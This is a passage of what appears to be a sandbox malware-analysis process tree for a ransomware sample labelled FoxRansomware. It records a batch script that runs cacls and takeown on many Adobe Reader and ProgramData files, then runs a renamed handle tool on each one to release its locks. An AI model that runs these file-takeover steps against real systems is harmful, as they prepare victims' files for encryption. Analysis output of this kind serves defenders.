C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "resource.xml" -nobanner3⤵PID:2568
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "resource.xml" -nobanner4⤵PID:2620
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3656
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""2⤵PID:2828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C3⤵PID:2100
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"3⤵
- Modifies file permissions
PID:1288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "ended_review_or_form.gif" -nobanner3⤵PID:4572
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "ended_review_or_form.gif" -nobanner4⤵PID:112
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""2⤵PID:2580
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C3⤵PID:280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"3⤵PID:2404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "reviewers.gif" -nobanner3⤵PID:4072
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "reviewers.gif" -nobanner4⤵PID:1988
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1388
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""2⤵PID:4084
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C3⤵PID:1732
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"3⤵
- Modifies file permissions
PID:4164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "server_lg.gif" -nobanner3⤵PID:2008
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "server_lg.gif" -nobanner4⤵PID:2596
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2472
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""2⤵PID:3908
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C3⤵PID:4568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"3⤵PID:4436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "turnOnNotificationInTray.gif" -nobanner3⤵PID:3068
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "turnOnNotificationInTray.gif" -nobanner4⤵PID:1448
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""2⤵PID:908
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C3⤵PID:4456
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"3⤵PID:2144
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "MinionPro-Bold.otf" -nobanner3⤵PID:4944
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "MinionPro-Bold.otf" -nobanner4⤵PID:2732
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""2⤵PID:4604
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C3⤵PID:1976
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"3⤵PID:1924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "zy______.pfm" -nobanner3⤵PID:1180
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "zy______.pfm" -nobanner4⤵PID:2380
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2240
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""2⤵PID:1200
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C3⤵PID:2864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"3⤵PID:4052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "brt.fca" -nobanner3⤵PID:3928
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "brt.fca" -nobanner4⤵PID:4036
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1508
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""2⤵PID:2588
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C3⤵PID:2728
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"3⤵PID:4820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "eng.hyp" -nobanner3⤵PID:4112
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "eng.hyp" -nobanner4⤵PID:3980
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2292
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""2⤵PID:4108
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C3⤵PID:4624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"3⤵PID:828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "zdingbat.txt" -nobanner3⤵PID:4412
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "zdingbat.txt" -nobanner4⤵PID:4288
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4124
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""2⤵PID:488
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C3⤵PID:1612
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"3⤵PID:3716
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "TURKISH.TXT" -nobanner3⤵PID:4264
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "TURKISH.TXT" -nobanner4⤵PID:4244
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4208
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:4260
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:1568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4400
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "watermark.png" -nobanner3⤵PID:3724
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "watermark.png" -nobanner4⤵PID:2968
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3708
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵PID:4404
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:1636
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "resource.xml" -nobanner3⤵PID:204
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "resource.xml" -nobanner4⤵PID:212
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""2⤵PID:4880
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:4428
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "resource.xml" -nobanner3⤵PID:1484
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "resource.xml" -nobanner4⤵PID:2824
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:856
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""2⤵PID:3572
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:4868
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "resource.xml" -nobanner3⤵PID:4460
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "resource.xml" -nobanner4⤵PID:5036
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5084
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""2⤵PID:1756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C3⤵PID:2016
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"3⤵
- Modifies file permissions
PID:4284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "AUMProduct.cer" -nobanner3⤵PID:2880
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "AUMProduct.cer" -nobanner4⤵PID:2296
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5056
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""2⤵PID:4968
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C3⤵PID:1808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"3⤵PID:3396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "email_all.gif" -nobanner3⤵PID:5108
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "email_all.gif" -nobanner4⤵PID:2992
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3284
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""2⤵PID:3756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C3⤵PID:4852
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"3⤵
- Modifies file permissions
PID:1260
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "open_original_form.gif" -nobanner3⤵PID:2524
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "open_original_form.gif" -nobanner4⤵PID:4508
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4524
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""2⤵PID:4468
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C3⤵PID:3644
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"3⤵PID:4500
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "rss.gif" -nobanner3⤵PID:3076
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "rss.gif" -nobanner4⤵PID:4476
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4564
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""2⤵PID:2036
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C3⤵PID:4840
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"3⤵PID:2004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "turnOffNotificationInTray.gif" -nobanner3⤵PID:3424
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "turnOffNotificationInTray.gif" -nobanner4⤵PID:3136
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3872
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""2⤵PID:2052
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C3⤵PID:1320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"3⤵PID:3444
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "CourierStd-Oblique.otf" -nobanner3⤵PID:3328
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "CourierStd-Oblique.otf" -nobanner4⤵PID:3436
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3200
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""2⤵PID:3276
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C3⤵PID:3344
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"3⤵PID:3164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "SY______.PFM" -nobanner3⤵PID:3168
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "SY______.PFM" -nobanner4⤵PID:1656
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3472
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""2⤵PID:3236
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C3⤵PID:2372
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"3⤵PID:3544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner3⤵PID:3220
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner4⤵PID:2452
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3188
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""2⤵PID:1760
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C3⤵PID:3592
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"3⤵
- Modifies file permissions
PID:2512
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "can129.hsp" -nobanner3⤵PID:2572
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "can129.hsp" -nobanner4⤵PID:3224
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3456
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""2⤵PID:3484
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C3⤵PID:3624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"3⤵PID:3600
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "icudt26l.dat" -nobanner3⤵PID:2396
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "icudt26l.dat" -nobanner4⤵PID:108
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""2⤵PID:3772
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C3⤵PID:880
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"3⤵PID:2768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "ROMANIAN.TXT" -nobanner3⤵PID:4972
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "ROMANIAN.TXT" -nobanner4⤵PID:3996
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2436
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""2⤵PID:2860
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C3⤵PID:3936
-
-
